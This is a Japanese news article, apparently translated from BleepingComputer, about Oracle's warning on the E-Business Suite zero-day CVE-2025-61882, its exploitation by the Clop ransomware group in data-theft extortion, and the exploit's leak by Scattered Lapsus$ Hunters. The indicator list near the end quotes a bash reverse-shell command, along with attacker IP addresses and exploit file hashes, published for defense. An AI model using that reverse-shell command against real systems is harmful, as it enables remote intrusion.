Oracleは、認証なしのリモートコード実行を許す重大なE-Business Suiteのゼロデイ脆弱性(CVE-2025-61882)について警告を発しており、この脆弱性はClopによるデータ窃取攻撃で実際に悪用されています。
この脆弱性はOracle E-Business SuiteのOracle Concurrent Processing製品(コンポーネント:BI Publisher Integration)に存在し、認証不要かつ容易に悪用可能なため、CVSS基本スコアは9.8となっています。
「このセキュリティアラートは、Oracle E-Business Suiteの脆弱性CVE-2025-61882に対応するものです」と新たなOracleのアドバイザリには記載されています。
「この脆弱性は認証なしでリモートから悪用可能です。つまり、ユーザー名やパスワードが不要でネットワーク越しに悪用される可能性があります。悪用に成功した場合、リモートコード実行が可能となります。」
Oracleは、このゼロデイ脆弱性がOracle E-Business Suiteバージョン12.2.3~12.2.14に影響を与えることを確認しており、問題に対処する緊急アップデートをリリースしました。同社は、顧客が新しいセキュリティアップデートを適用する前に、2023年10月のクリティカルパッチアップデートを先にインストールする必要があると注意を促しています。
Clopによるデータ窃取攻撃でゼロデイが悪用
Oracleは明言していませんが、最近Telegramで脅威アクターが共有したOracle EBSのエクスプロイトに対応する侵害の兆候(IoC)を公開しており、これがゼロデイ脆弱性であることを示唆しています。
また、Mandiant – Google CloudのCTOであるCharles Carmakal氏も、2025年8月に発生したデータ窃取攻撃でClopランサムウェアグループがこの脆弱性を悪用したことを確認しています。
「Clopは2025年8月、複数のOracle EBSの脆弱性を悪用し、複数の被害者から大量のデータを窃取しました」とCarmakal氏はBleepingComputerへの声明で述べています。
「複数の脆弱性が悪用されており、その中には2025年7月のOracleアップデートで修正されたものと、今週末に修正された(CVE-2025-61882)ものが含まれています」とCarmakal氏は続けています。
CVE-2025-61882は、認証不要のリモートコード実行を可能にする重大な(CVSS 9.8)脆弱性です。
Clopの最新の恐喝キャンペーンのニュースは先週初めて明らかになり、MandiantとGoogle Threat Intelligence Group(GTIG)が、複数の企業が脅威アクターを名乗るメールを受け取った新たなキャンペーンを追跡していると報告しました。
これらのメールでは、Clopが企業のOracle E-Business Suiteシステムからデータを窃取し、盗んだデータを流出させないための身代金を要求していると記載されていました。
「私たちはCL0Pチームです。もしご存じなければ、インターネットで私たちについて検索してみてください」と、BleepingComputerに共有された恐喝メールには書かれています。
「私たちは最近、貴社のOracle E-Business Suiteアプリケーションに侵入し、多くのドキュメントをコピーしました。すべての機密ファイルやその他の情報は現在、私たちのシステムに保管されています。」
出典:Google
Clop恐喝グループは、ゼロデイ脆弱性を悪用した大規模なデータ窃取攻撃の長い歴史があり、以下の事例が含まれます:
- 2020年: Accellion FTAプラットフォームのゼロデイを悪用し、約100組織に影響。
- 2021年: SolarWinds Serv-U FTPソフトウェアのゼロデイを悪用。
- 2023年: GoAnywhere MFTプラットフォームのゼロデイを悪用し、100社以上に侵入。
- 2023年: MOVEit Transferのゼロデイを悪用したClop史上最大のキャンペーンで、世界中の2,773組織からデータを窃取。
- 2024年: Cleoファイル転送の2つのゼロデイ(CVE-2024-50623およびCVE-2024-55956)を悪用し、データを窃取し企業を恐喝。
その後、ClopはBleepingComputerに対し、恐喝メールの背後に自分たちがいること、そしてOracleのゼロデイ脆弱性を悪用してデータを窃取したことを認めました。
「すぐにすべてが明らかになるでしょう。Oracleはコア製品にバグを抱えており、またしてもClopが事態を救う役目を担うことになりました」とClopはBleepingComputerに語り、新たな脆弱性が悪用されたことを示唆しました。
しかし、Oracleは当初、Clopの恐喝キャンペーンを2025年7月に修正された脆弱性に関連付けており、今回攻撃に使われた新たなゼロデイについては触れていませんでした。
Oracleは現在、ゼロデイ悪用の侵害指標(IoC)を公開しており、これには悪用に使われた2つのIPアドレス、リモートシェルを開くコマンド、エクスプロイトアーカイブおよび関連ファイルが含まれます。
- 200[.]107[.]207[.]26 – 観測された悪用に関連するIPアドレス(HTTP GETおよびPOSTリクエスト)
- 185[.]181[.]60[.]11 – 観測された悪用に関連するIPアドレス(HTTP GETおよびPOSTリクエスト)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 – リバースシェルを開くためにエクスプロイトが実行したコマンド
- 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip(エクスプロイトアーカイブ)
- aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py(エクスプロイトの一部)
- 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py(エクスプロイトの一部)
Scattered Lapsus$ Huntersによるエクスプロイトの流出
ClopがOracleゼロデイの悪用とデータ窃取攻撃の背後にいる一方で、このゼロデイのニュースは最近、自らも大規模なSalesforce顧客へのデータ窃取攻撃で話題となっている別の脅威アクターグループから最初にもたらされました。
金曜日、このグループは自らを「Scattered Lapsus$ Hunters」と名乗り、Scattered Spider、Lapsus$、ShinyHuntersの脅威アクターで構成されていると主張し、Clop攻撃に関連するとする2つのファイルをTelegramで流出させました。
「GIFT_FROM_CL0P.7z」と名付けられたファイルには、ファイル名から「support.oracle.com」に関連すると思われるOracleのソースコードが含まれていました。
しかし、脅威アクターはまた、「ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip」というアーカイブも公開し、ファイル名からClopが使用したOracle E-Businessのエクスプロイトであることを示唆しました。
BleepingComputerは、これがOracleの侵害指標(IoC)に記載されているファイルと同一であることを確認しました。
このアーカイブには、readme.mdの説明ファイルと、exp.pyおよびserver.pyという2つのPythonスクリプトが含まれています。これらのPythonスクリプトは、脆弱なOracle E-Business Suiteインスタンスを悪用し、任意のコマンドを実行したり、脅威アクターのサーバーにリバースシェルを開いたりするために使用されます。
Oracleが公開したIoCにScattered Lapsus$ Huntersが共有したエクスプロイトアーカイブ名が記載されていることから、これがClopランサムウェアグループが使用したエクスプロイトであることが確認されました。
しかし、Scattered Lapsus$ Huntersの脅威アクターがどのようにしてこのエクスプロイトにアクセスしたのか、また彼らが何らかの形でClopと協力しているのかについては疑問が残ります。
BleepingComputerは、ShinyHuntersおよびClopの両グループの代表者にこの関係について質問しましたが、現時点では回答を得られていません。
